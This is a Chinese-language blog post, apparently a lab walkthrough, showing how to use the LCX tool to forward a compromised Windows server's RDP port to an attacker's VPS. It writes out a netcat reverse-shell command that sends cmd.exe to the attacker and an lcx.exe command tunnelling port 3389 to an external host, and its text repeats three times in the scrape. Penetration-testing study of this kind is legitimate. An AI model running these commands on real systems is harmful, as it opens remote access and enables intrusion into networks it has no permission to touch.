LCX 內網端口轉發紀錄

6月 12, 2021

LCX 內網端口轉發紀錄

作者 : Noth

前言 :

Lcx 和前幾篇介紹的 Ngrok 很像，用途都是拿來做端口轉發用 xD 只不過 Ngrok 是將端口彈到官網自帶的 Server 上去，而 Lcx 是彈到我們自己的 VPS 上面，如果各位小夥伴還不懂的話，讓我們直接看底下的原理圖，我們直接實戰一次 !

內文 :

實作環境 :

攻擊者 : 192.168.111.130 (Windows 10，內網)

攻擊者 : 51.68.120.185 (VPS，Windows 10，外網)

受害者 : 192.168.111.131 (Windows 2008，內網)

前提 : 受害者已經用一句話連接菜刀、蟻劍、冰蠍連接

上傳 LCX 到 C:/Windows/Temp/ 目錄 :

蟻劍終端進行反彈交互式 Shell 到 Windows 本機 :

nc64.exe 192.168.111.130 443 -e cmd.exe

本地端 windows 監聽 :

nc64.exe -lvvp 443

成功反彈交互式的 Shell :

執行 lcx.exe :
lcx.exe -slave 51.68.120.185 1060 127.0.0.1 3389

在 VPS 進行 listen，將監聽到的 1060 端口轉發到 1061 :

左邊 VPS 數據流在傳輸，右邊也在 Connection :

開啟 mstsc 連接 51.68.120.185:1061，成功連接 :

當然在實戰的過程中會碰到一些坑 xD 例如 VPS 上面防火牆要設置端口流量能不能 inbound 進來等，還是要對自己說一聲，多實戰 ... 多實戰 ...

留言

Uneststigen-do19932022年4月23日晚上7:18
Uneststigen-do1993 Antonio Rodriguez https://wakelet.com/wake/t0jZlAYxQjp5v7kL_luF5
gnuttanecheal
回覆刪除
回覆

新增留言

張貼留言

搜尋此網誌

Noth

LCX 內網端口轉發紀錄

LCX 內網端口轉發紀錄

作者 : Noth

前言 :

Lcx 和前幾篇介紹的 Ngrok 很像，用途都是拿來做端口轉發用 xD 只不過 Ngrok 是將端口彈到官網自帶的 Server 上去，而 Lcx 是彈到我們自己的 VPS 上面，如果各位小夥伴還不懂的話，讓我們直接看底下的原理圖，我們直接實戰一次 !

內文 :

實作環境 :

攻擊者 : 192.168.111.130 (Windows 10，內網)

攻擊者 : 51.68.120.185 (VPS，Windows 10，外網)

受害者 : 192.168.111.131 (Windows 2008，內網)

前提 : 受害者已經用一句話連接菜刀、蟻劍、冰蠍連接

上傳 LCX 到 C:/Windows/Temp/ 目錄 :

蟻劍終端進行反彈交互式 Shell 到 Windows 本機 :

nc64.exe 192.168.111.130 443 -e cmd.exe

本地端 windows 監聽 :

nc64.exe -lvvp 443

成功反彈交互式的 Shell :

執行 lcx.exe :
lcx.exe -slave 51.68.120.185 1060 127.0.0.1 3389

在 VPS 進行 listen，將監聽到的 1060 端口轉發到 1061 :

左邊 VPS 數據流在傳輸，右邊也在 Connection :

開啟 mstsc 連接 51.68.120.185:1061，成功連接 :

當然在實戰的過程中會碰到一些坑 xD 例如 VPS 上面防火牆要設置端口流量能不能 inbound 進來等，還是要對自己說一聲，多實戰 ... 多實戰 ...

留言

張貼留言

熱門文章

Windows Print Spooler (CVE-2021-1675 域提權)

導出 ntds.dit /SYSTEM 文件/域散列值

LCX 內網端口轉發紀錄

LCX 內網端口轉發紀錄

作者 : Noth

前言 :

Lcx 和前幾篇介紹的 Ngrok 很像，用途都是拿來做端口轉發用 xD 只不過 Ngrok 是將端口彈到官網自帶的 Server 上去，而 Lcx 是彈到我們自己的 VPS 上面，如果各位小夥伴還不懂的話，讓我們直接看底下的原理圖，我們直接實戰一次 !

內文 :

實作環境 :

攻擊者 : 192.168.111.130 (Windows 10，內網)

攻擊者 : 51.68.120.185 (VPS，Windows 10，外網)

受害者 : 192.168.111.131 (Windows 2008，內網)

前提 : 受害者已經用一句話連接菜刀、蟻劍、冰蠍連接

上傳 LCX 到 C:/Windows/Temp/ 目錄 :

蟻劍終端進行反彈交互式 Shell 到 Windows 本機 :

nc64.exe 192.168.111.130 443 -e cmd.exe

本地端 windows 監聽 :

nc64.exe -lvvp 443

成功反彈交互式的 Shell :

執行 lcx.exe : lcx.exe -slave 51.68.120.185 1060 127.0.0.1 3389

在 VPS 進行 listen，將監聽到的 1060 端口轉發到 1061 :

左邊 VPS 數據流在傳輸，右邊也在 Connection :

開啟 mstsc 連接 51.68.120.185:1061，成功連接 :

當然在實戰的過程中會碰到一些坑 xD 例如 VPS 上面防火牆要設置端口流量能不能 inbound 進來等，還是要對自己說一聲，多實戰 ... 多實戰 ...

留言

張貼留言

熱門文章

Windows Print Spooler (CVE-2021-1675 域提權)

導出 ntds.dit /SYSTEM 文件/域散列值

執行 lcx.exe :
lcx.exe -slave 51.68.120.185 1060 127.0.0.1 3389